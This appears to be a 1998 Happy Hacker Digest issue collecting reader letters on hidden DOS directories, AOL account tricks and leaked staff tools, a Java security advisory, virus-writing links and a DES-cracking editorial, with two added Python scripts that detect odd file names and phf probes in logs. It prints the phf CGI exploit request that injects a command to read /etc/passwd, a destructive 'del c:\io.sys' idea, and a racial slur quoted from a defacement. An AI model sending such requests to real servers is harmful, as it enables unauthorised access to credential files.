July 27, 1998

=====================================================================

=====================================================================
URL of the day: http://www.avolio.com/tracing.html Tracing Email...
See back issues of the Happy Hacker Digest and Guides to (mostly)
Harmless Hacking at http://www.Happyhacker.org.
GTMHH en espanol: http://underhack.islatortuga.com
Svenska: http://w1.340.telia.com/~u34002171/hhd/gtmhh/svenska/hhdsvensk.html
=====================================================================

TABLE OF CONTENTS

* RE: Hiding directories
* AOL exploit
* Re: GTMHH: Part 2, Intro to Computer Viruses
* New Java Security Flaw Found
* The little black book of computer viruses
* RE: VBScript Exploit (What Microsoft [allegedly] had to say.)
* Good encryption/decryption mailing list
* URL for Virus Info
* Old school techniques
* Editorial: Snap, Crackle - Cracked!

==================================================================
 *** RE: Hiding directories
==================================================================
From: "Nils van den Heuvel" <n.heuvel@wxs.nl>

> From: "Stephen Nicholas (AKA: Elfshadow)" <Elfshadow@innocent.com>
> To Happy Hacker
> In regards to Thomason's <midas@pacbell.net> letter in the June 23rd edition,
> Thomason was talking about how he had a bunch of directories that he couldn't
> delete, move, or get any access to, either through DOS OR Win95.
> Then it goes on to explain that by using ASCII char ALT-255 (null) you
> can make directories that can be hidden etc.
> Well, I have found a way around it. There is a neat little DOS program called
> 'X-Tree Gold', it is a fairly old program, made a while back. This program
> CAN view, edit, rename, delete, and otherwise manipulate directories with
> an ALT 255 (Or any ASCII chars) in the name!!

Well, that's pretty cool, but all the DOS + WIN '95 tools work on it
too...  and it isn't really invisible... look what it says when you
do a "dir /ad" (ok, I edited it a little to make me look 31337):

 Het volume in station C heeft geen naam.
 Het volumenummer is 3764-1E03.
 Directory van C:\.

LINUX  <DIR> 17-04-98  16:55 linux
KERNEL  <DIR> 05-06-98  17:28 kernel
PHRACK  <DIR> 10-07-98  16:47 phrack
   <DIR> 15-07-98  12:00
          0 bestand(en)              0 bytes.
       126 dir('s)      2.447.863.808 bytes beschikbaar.

(sorry, I have a Dutch version of W'95)
see that line that says
"   <DIR> 15-07-98  12:00" ???

That's the ALT-255 directory, you can enter it by typing "cd <ALT-255>"
where <ALT-255> is the character that's generated by typing 255 on the
numeric keypad while pressing the ALT button...
All of the DOS + W'95 commands accept the <ALT-255> character, so
you can deltree it, rd it, etc....

Very funny, Scotty. Now beam down my clothes!
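An added example, not from either post, that shows the same point from the administrator's side: an ALT-255 name is invisible to the eye, not to programs. It builds a constructed sample tree containing a no-break-space directory like the one in the listing above, then reports every entry whose name is blank or contains control, format or non-ASCII space characters; the zero-width-space entry is an assumed extra case that generalises the idea beyond the single ALT-255 character.

```python
"""Find directory entries whose names are blank or contain unprintable characters."""
import os
import tempfile
import unicodedata
from typing import Dict, Optional

# Typing ALT-255 on a DOS/Windows keyboard emits byte 0xFF, which code page 437
# maps to U+00A0 NO-BREAK SPACE: it prints as a blank, so the name looks empty.
ALT_255 = bytes([0xFF]).decode("cp437")  # == "\xa0"


def flag_name(name: str) -> Optional[str]:
    """Return why a name looks designed to hide, or None if it is ordinary."""
    if not name.strip():  # str.strip() removes U+00A0 too, so "\xa0" counts as blank
        return "blank name (only whitespace)"
    odd = []
    for ch in name:
        cat = unicodedata.category(ch)
        # Cc = control, Cf = format (zero-width chars), Zs = space separators
        if cat in ("Cc", "Cf") or (cat == "Zs" and ch != " "):
            odd.append("U+%04X %s" % (ord(ch), unicodedata.name(ch, "?")))
    return "contains " + ", ".join(odd) if odd else None


def scan_directory(path: str) -> Dict[str, str]:
    """Map each suspicious entry name in one directory to the reason it was flagged."""
    findings: Dict[str, str] = {}
    with os.scandir(path) as entries:
        for entry in entries:
            reason = flag_name(entry.name)
            if reason:
                findings[entry.name] = reason
    return findings


def demo() -> Dict[str, str]:
    """Build a constructed sample tree like the one in the post and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for normal in ("linux", "kernel", "phrack"):
            os.mkdir(os.path.join(root, normal))
        os.mkdir(os.path.join(root, ALT_255))          # the "invisible" directory
        os.mkdir(os.path.join(root, "kernel\u200b"))   # assumed case: looks like "kernel"
        return scan_directory(root)


if __name__ == "__main__":
    for name, reason in demo().items():
        print(repr(name), "->", reason)
```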
===================================================================
 *** AOL exploit
===================================================================
From: "Tiberian Son" <TiberianSon@Erols.Com>
 

Hello, Happy Hackers everywhere!

Since the magazine has sunk to a new low by mentioning AOL hacks <G>, I
decided to go let some other people know about AOL.  I started out on AOL.
It used to be trying to phish an overhead account here and there (AOLese for
"superuser" or "root"), or going and dropping a mijilion messages into
someone's e-mail box.  Any person with Visual Basic can do it.  Well, then
came UTILITIES to do it! YES, utilities that ran under a GUI and were USABLE
to blow up chatrooms, type in ASCII codes, and kick people offline with an
exploit in the IM programming that overloaded their soundcards, locked up
AOL, and crashed their computers!  Well, and I take my hat off to Suzbik for
mentioning this, it was found that AOL would store your passwords in
plaintext!  Well the problem is that people like, er, people <G> can get at
this and use it!  'Nuff said.

Another neat AOL trick is "ghosting".  It doesn't ghost your text, but it
ghosts YOU!  It is really computer dependent (the more upgrades your AOL
software has gone through, the better, and if you have a really old copy of
AOL, the best!), but it is nice because you can call the 800 number, and the
server won't see you, so it won't...  What you do is dial into AOL (a futile
effort), and connect.  When it says "checking password" at the bottom of
that window, press space (or hit cancel).  Now, dial again, and complete the
process.  NOTE:  DON'T CHANGE WHERE YOU ARE DIALING INTO, BECAUSE IT'S THE
DIALUP COMPUTER YOU ARE AFFECTING!  If all goes well, try to IM yourself.
It should return "User is offline".  Whoo hoo!  Now, you can lurk in
chatrooms and not show up on the room occupant list, and might have access
to some new keywords (you have to hit or miss this one, it comes and goes in
regards to keyword access).

After that, ghosting became fun (IM your worst enemy, taunting the hell out
of them, and they can't TOS you because, heck, YOU'RE OFFLINE!), but it wasn't
enough!  We needed blood!  The blood of the heretic Steve Case!  Well, we
all ran about, searching for more AOL hacks.  About that time, some
disgruntled staff member released his set of tools that made him a staff
member.  People tried to keep it under wraps, but couldn't, because he
apparently went into all the piracy rooms (piracy is real popular on AOL
because non-disclosure and privacy agreements make you invincible on it, try
private room "Fate", "FateX", or those with an ascending number on them,
such as "Fate1", or "FateX1"), and mass mailed it to everyone!  Whoo hoo!
Well, everyone who tried to use it couldn't, because AOL checks your
account, and nicely deletes them for you when it finds you.  So along comes
a guy, who figures a way around this process (and most people have given up,
from all the virii floating around in false mailings of these things), and
HE distributes it to the masses completed.

AOL is organised by a series of INVOKES, or numbers assigned to the windows
of areas.  Most of these invokes cannot be used at the keyword prompt, but,
just as an example, we can see some of AOL's hypocrisy and lies.  At the
keyword prompt, type "upgrade".  Opt for the AOL 4 upgrade/Beta Test.  Oops,
you can't use it because you use Internet Explorer 4.0!  Oops!  I am
connecting to AOL on my Linux box and use Mosaic!  Hmmm...  Now try keyword
"Beta".  You should be told you don't have access to this area!  I wonder
what is in beta?  Try keyword "aol://1722:macbeta".  Note the INVOKE number
in there!  It should get you into the area where you can download AOL 4,
because they are LYING TO THE PUBLIC about IE4.  In fact, they encourage
using IE4 in the beta area!  If you can't get in, try ghosting and then get
in.  Again, it seems to be software specific.  There is a beta test form at
keyword "beta", but they have been denying that too since the tests are so
overloaded.

Now, what was that about the staff tool?  Well, no-one really knows if it is
just another internet myth, or if it was real, but either way, it works.  To
use it, YOU MUST HAVE AOL 3.0 FOR WINDOWS 3.1 INSTALLED.  I installed mine
into "C:\AOL31\", just for the purpose of using this.  It installs a "*"
menu to your toolbar in AOL (if you use it on the Win95 version, you go
boom!), and from there, explore!  It has some text files documenting some
invokes (but I think you will have much more fun exploring the system!) and
some text documents explaining the stuff inside it.  Double click on
Run1st.exe to install it initially, and then on Run2nd.exe to mask the tools
from AOL.  Since you have them, on a lark, install them but don't click on
Run2nd.exe and watch as AOL cleans out the master tools (have the ZIP on
disk!).  As usual, use at your own risk.

I send all this to you in good company.  If I thought you could hit the CRIS
server (the server for managing the accounts), I wouldn't send it to you
(tell me if you do, I am interested).  Second, a point of interest:
RainMan.  You've seen the movie, now play the AOL utility!  What RainMan
does is that it allows AOL staff to change their areas (for reference, it was
the very tool used by hackers running the very same program to change the
caption of the OJ Simpson trial to "It's a picture of a f***ing n***er!").
I never had the balls to try it.  Again, if you do try it, tell me what
happens.  The Rainman command set invokes should also be in there, but I
haven't had the occasion to hack AOL in a loooooooong while.  If you follow
the invokes to "the secret staff area", and this is amusing, you'll
eventually hit upon a message board from '93, and it is interesting reading
(it no longer works, the area was created by hackers, and AOL never caught
on, or maybe they did, it's in ruins now, and is barely intelligible, but
scattered cries still haunt it).  Second:  AOLSpy can be used to get invokes
from windows.  Sometimes they work, other times not.  If an invoke doesn't
work at first, try it again in five minutes.  Sometimes they can be clogged,
since the invoke system was never intended for navigation, from what I
understand.

Mail me at TiberianSon@Erols.com with any questions.

"Peace upon you, my brothers.  May we someday meet face to face, and unite
together."

Laters, the Tiberian Son
==================================================================
 *** Re: GTMHH: Part 2, Intro to Computer Viruses
==================================================================
From: Matt Vollmar <matt@matt.sapien.net>

I am curious if you actually tried this "virus". According
to Sun Microsystems, you cannot access system properties on which an
applet is running...this, fortunately, turns out to be true, as
the "applet" that is mentioned in this article is not even an
"applet"...it is, however, an application, which MUST be run from
the command line. This means that a person must purposely download
the java byte-code, download the "homer.sh", and then run it with
a command like "java Homer". I would recommend trying to run this
from the web...it will do absolutely nothing but cause the Java
interpreter in Netscape to say:

Applet Homer can't start: exception: java.lang.ClassCastException:

Homer is not an applet

Thank God for reality...who knows what kind of havoc might result
if you had actually been right...it's a good thing Sun usually does
what they say they will do.

Note:  The virus was not even written as an applet, which is obvious
from the code to anyone familiar with Java.

-- Matt Vollmar
==================================================================
 *** New Java Security Flaw Found
==================================================================
(The following is reprinted from the Bugtraq email list, to subscribe to
Bugtraq, email LISTSERV@NETSPACE.ORG with message "subscribe bugtraq")
From: Gary McGraw <gem@RSTCORP.COM>

Hello all,
Princeton's Safe Internet Programming Team recently announced the
discovery of a serious Java security hole that can be leveraged into
an attack applet.  Their description follows:
------------------------------------------------------------------------
We have found another Java security flaw that allows a malicious applet
to disable all security controls in Netscape Navigator 4.0x.  After
disabling the security controls, the applet can do whatever it likes on
the victim's machine, including arbitrarily reading, modifying, or
deleting files.  We have implemented a demonstration applet that deletes
a file.

This flaw, like several previous ones, is in the implementation of the
"ClassLoader" mechanism that handles dynamic linking in Java.  Despite
changes in the ClassLoader implementation in JDK 1.1 and again in JDK
1.2 beta, ClassLoaders are still not safe; a malicious ClassLoader can
still override the definition of built-in "system" types like
java.lang.Class.  Under some circumstances, this can lead to a
subversion of Java's type system and thus a security breach.

The flaw is not directly exploitable unless the attacker can use some
other secondary flaw to gain a foothold.  Netscape 4.0x has such a
secondary flaw (a security manager bug found by Mark LaDue), so we were
able to demonstrate how to subvert Netscape's security controls.  We are
not aware of any usable secondary flaws in Microsoft's and Sun's current
Java implementations, so they appear not to be vulnerable to our attack
at present.

Please direct any inquiries to Edward Felten at (609) 258-5906 or
felten@cs.princeton.edu.

Dirk Balfanz, Drew Dean, Edward Felten, and Dan Wallach
Secure Internet Programming Lab, Department of Computer Science
Princeton University
http://www.cs.princeton.edu/sip
==================================================================
 *** The little black book of computer viruses
==================================================================
From: ALPHA60 (alpha60@usa.net)

Hi!

I just thought you'd want to tell everyone on the HH list that they
can download "the little black book of computer viruses" by Mark A.
Ludwig for free from:

 http://www.ummah.net/hackers/download/bbbv.zip

The book is in the public domain.

Keep up the good work,
ALPHA60
==================================================================
 *** RE: VBScript Exploit (What Microsoft [allegedly] had to say.)
==================================================================
From: "Ben Wright" <witchdoctor_98@hotmail.com>

Happy Hackers,

In response to the message posted by <VM370x@aol.com>:

I contacted a friend at Microsoft and he said that "Microsoft" felt it
was up to the users to use their common sense in the matter but
nonetheless he did recognise it to be a substantial problem. In relation
to the comment about appending del c:\io.sys to autoexec.bat I
understand that it would return an Access Denied error, although I'm
sure it isn't too difficult to figure out a workaround ;o) - (I haven't
been able to test this so don't go trying it!)

Thanks all,
Ben.

(P.S. Is there any chance whatsoever of having a Win95/98 box such as
the Unix ones used in the Happy Hacker Wargames)

[Dale: Got one to spare???]
==================================================================
 *** Good encryption/decryption mailing list
==================================================================
From: "BOB AUGER" <bobin_69@hotmail.com>

Carolyn,

I recently came upon a good encryption/decryption mailing list that may
come in handy to you or your subscribers.
(Not really good for newbies)
:(

To subscribe to the list, send a message to:
   <crypto-gram-subscribe@chaparraltree.com>
To remove your address from the list, send a message to:
   <crypto-gram-unsubscribe@chaparraltree.com>
=================================================================
 *** URL for Virus Info
=================================================================
From: "Nancy Nancy" <nancy_nancy@mailexcite.com>

The following URL contains lots of info on viruses. It's frequently updated
and sometimes has a tutorial on writing viruses.

http://www.codebreakers.org
=================================================================
 *** Old school techniques
=================================================================
From: SERIALMONKEY

I was just wondering why you guys haven't mentioned this age-old school
technique in one of your newsletters to the newbies....

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

or

/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
 

(example: type one of the above after a server's name....and with a little
suerte, you might get something like this: /usr/local/bin/ph -m alias=x\
/bin/cat /etc/passwd)

I have had some rather interesting results with this in the past, and still
every once in a while get something back like "smile your on candid camera"
or a big ASCII middle finger.
 

OXOXOX,
SERIALMONKEY

[Carolyn: This is the phf exploit.  It almost never works any more.  If your
ISP catches you using it, you might get kicked off your account.]
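An added defensive example, not part of SERIALMONKEY's post or the editor's note: the script scans constructed Common Log Format lines for the phf request shown above. It URL-decodes the query string, because the whole trick is the encoded newline (%0a) that lets a second shell command follow the phonebook lookup, and it reports the client address and HTTP status so an administrator can see who probed and whether /cgi-bin/phf was even present.

```python
"""Flag phf newline-injection probes in web server access logs."""
import re
from typing import Dict, List
from urllib.parse import unquote, urlsplit

# NCSA/Apache common log format; the sample lines below are constructed.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# phf handed its query values to a shell; an encoded newline (%0a) terminated
# the ph command so that whatever followed ran as a second command.
SHELL_META = set(";|`$&")


def classify(target: str) -> Dict[str, str]:
    """Describe one request target, or return {} when it does not touch phf."""
    parts = urlsplit(target)
    if not parts.path.endswith("/phf"):
        return {}
    decoded = unquote(parts.query)
    if "\n" in decoded or "\r" in decoded:
        rule = "phf-newline-injection"
    elif any(ch in SHELL_META for ch in decoded):
        rule = "phf-shell-metachar"
    else:
        rule = "phf-access"          # plain phonebook query: still worth noting
    return {"rule": rule, "path": parts.path, "decoded_query": decoded}


def detect_phf(lines: List[str]) -> List[Dict[str, str]]:
    """Parse CLF lines and return one finding per phf request, in log order."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue                 # unparseable line: skip rather than guess
        finding = classify(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), status=m.group("status"))
            findings.append(finding)
    return findings


# Constructed sample log: two probes from one host, one ordinary lookup, one benign hit.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jul/1998:10:15:02 -0600] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1843',
    '198.51.100.7 - - [27/Jul/1998:10:16:30 -0600] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 512',
    '203.0.113.5 - - [27/Jul/1998:10:17:01 -0600] "GET /index.html HTTP/1.0" 200 5120',
    '192.0.2.10 - - [27/Jul/1998:10:18:44 -0600] "GET /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 214',
]

if __name__ == "__main__":
    for f in detect_phf(SAMPLE_LOG):
        print(f["ip"], f["status"], f["rule"], repr(f["decoded_query"]))
```

A 200 on the injected request is the line to worry about; a 404 means the host merely saw the probe.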

=================================================================
 *** Editorial: Snap, Crackle - Cracked!
=================================================================
From: Dale Holmes <editor@cmeinel.com>

I was making myself breakfast this morning when I saw it. I don't mind
telling you that breakfast is my favorite meal of the day and I take
great pride in my breakfast making abilities. Sometimes I pour the milk
right into the center of the bowl, other times I pour it gently around
the side. While pouring my milk this morning, however, I was distracted
by a television commercial. The voice on TV said "The European
cryptography industry has one word for the US Government - Thanks!"

I laughed so hard I spilled milk all over the table. I knew what they
meant. They were referring to the HUGE debate in the US over its
encryption export policy. The US government controls the export of
encryption software, and has long argued that 56-bit DES encryption
was sufficiently secure that it was made the US standard in 1977.
It has limited exports of software using DES technology to 40-bit keys.
The government has argued that cracking 56-bit DES would require such
an investment in time and money that it was nearly impossible. Yeah, right!

The Electronic Frontier Foundation (EFF), a civil liberties advocacy
group, built a machine that cost $210,000, made from "old" technology,
that successfully broke 56-bit DES encryption in less than 3 days.
They have written a book about how it was done, entitled "Cracking DES:
Secrets of Encryption Research, Wiretap Politics, and Chip Design",
available now from O'Reilly and Associates. I suggest you buy it today!

Soon, if not already, every enemy that the US government fears will
have the technology to crack 56-bit DES, and they will be doing so.
US companies that build encryption into their products will no longer
be able to compete in the global marketplace - nobody in their right
mind will buy 56-bit DES now that they know how weak it is.

Most businesses outside the United States are using 128-bit encryption.
American companies are too, but only here in the US. Now that the EFF
has demonstrated how simple and cheap it is to crack the US encryption
standard, look for the US crypto policy debate to really heat up. The
TV ad that I saw this morning was a call for citizens to get involved
in the debate. Once the ad was over, I looked down and noticed the spilled
milk all over my table.

There is no sense crying over spilled milk, but the current US crypto
policy, well, that is another matter...
__________________________________________________________________

 
 

This is a list devoted to *legal* hacking! If you plan to use any
information in this Digest or at our Web site to commit crime, go away!
Foo on you! Happy Hacker is a 501 (c) (3) tax deductible organization
in the United States operating under Shepherd's Fold Ministries. Yes!
This is all a plot to save your immortal souls!

For Windows questions, please write Roger Prata<rprata@cmeinel.com>;
for Macs, write Strider <Strider@clarityconnect.com>,
and Unix, write Josh Fritsch <derr@txdirect.net>
Happy Hacker Digest editor: Dale Holmes <editor@cmeinel.com>

Happy Hacker Grand Pooh-bah: Carolyn Meinel <>

 © 2013 Happy Hacker All rights reserved.